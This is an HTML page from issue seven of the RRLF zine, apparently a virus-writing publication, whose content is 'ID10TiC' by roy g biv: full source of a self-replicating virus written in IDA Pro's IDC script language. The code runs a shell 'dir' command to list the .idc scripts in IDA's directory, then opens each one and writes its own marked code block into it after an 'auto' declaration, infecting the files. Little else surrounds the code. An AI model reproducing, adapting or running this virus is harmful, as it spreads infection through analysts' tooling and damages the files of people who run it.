<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="Content-Script-Type" content="text/javascript">
<title>RRLF ZINE ISSUE SEVEN   -   SOURCES</title>
<link rel="stylesheet" type="text/css" href="../css/Style.css">
<script src="../js/Preload.js" language="javascript" type="text/javascript"></script>
<script src="../js/Hover.js" language="javascript" type="text/javascript"></script>
</head>

<body>
<table cellpadding="0" cellspacing="0" border="0">
 <tr><td>
 <table align="left" cellpadding="0" cellspacing="0" border="0">
  <tr>
   <td rowspan="3"><a href="../html/editorial.htm"><img src="../images/Top_01.jpg" alt="" border="0"></a></td>
   <td colspan="6"><img src="../images/Top_02.jpg" alt="" border="0"></td>
  </tr>
  <tr>
   <td><a href="../html/articles.htm"><img src="../images/Top_Articles_Out.jpg" alt="" border="0" id="articles" onMouseOver="ArticlesOver(1)" onMouseOut="ArticlesOver(0)"></a></td>
   <td rowspan="2"><img src="../images/Top_03.jpg" alt="" border="0"></td>
   <td><a href="../html/sources.htm"><img src="../images/Top_Sources_Out.jpg" alt="" border="0" id="sources" onMouseOver="SourcesOver(1)" onMouseOut="SourcesOver(0)"></a></td>
   <td rowspan="2"><img src="../images/Top_04.jpg" alt="" border="0"></td>
   <td><a href="../html/art.htm"><img src="../images/Top_Art_Out.jpg" alt="" border="0" id="art" onMouseOver="ArtOver(1)" onMouseOut="ArtOver(0)"></a></td>
   <td rowspan="2"><img src="../images/Top_05.jpg" alt="" border="0"></td>
  </tr>
  <tr>
   <td><img src="../images/Top_06.jpg" alt="" border="0"></td>
   <td><img src="../images/Top_07.jpg" alt="" border="0"></td>
   <td><img src="../images/Top_08.jpg" alt="" border="0"></td>
  </tr>
 </table>
 </td></tr>
 <tr><td>
  <br>
  <div class="title" align="left">ID10TiC</div>
  <div class="title_by" align="left">by roy g biv</div>
  <br><a href="Idiotic" target="_blank" class="l">See also the project folder</a><br><br>
  <pre>
/*ID10TiC - roy g biv 06/07/06*/{auto a,b,c,d,e,f,g,h,i,j;Exec("%comspec% /c dir /b "+(a=GetIdaDirectory()+"\\idc\\")+"*.idc&gt;r");while(d&gt;=0){b=fopen("r","r");c=0;while(!c&&(d=readstr(b))&gt;0){e=fopen(a+substr(d,0,strlen(d)-1),"r+");while((d=readstr(e))&gt;0)if(strstr(d,"auto")&gt;0){if((f=strstr(d,"/*ID"))&gt;0){if(!g){c=1;g=1;h=substr(d,f,strstr(d,"/"+"}")+2);}break;}if(g){fseek(e,i=ftell(e)-strlen(d)+strstr(d,59)+1,0);f="";while((j=readstr(e))&gt;0)f=f+j;fseek(e,i,0);writestr(e,h+f);break;}}fclose(e);}fclose(b);}/**/}
  </pre>
  <br>
 </td></tr>
 </table>
</body>
</html>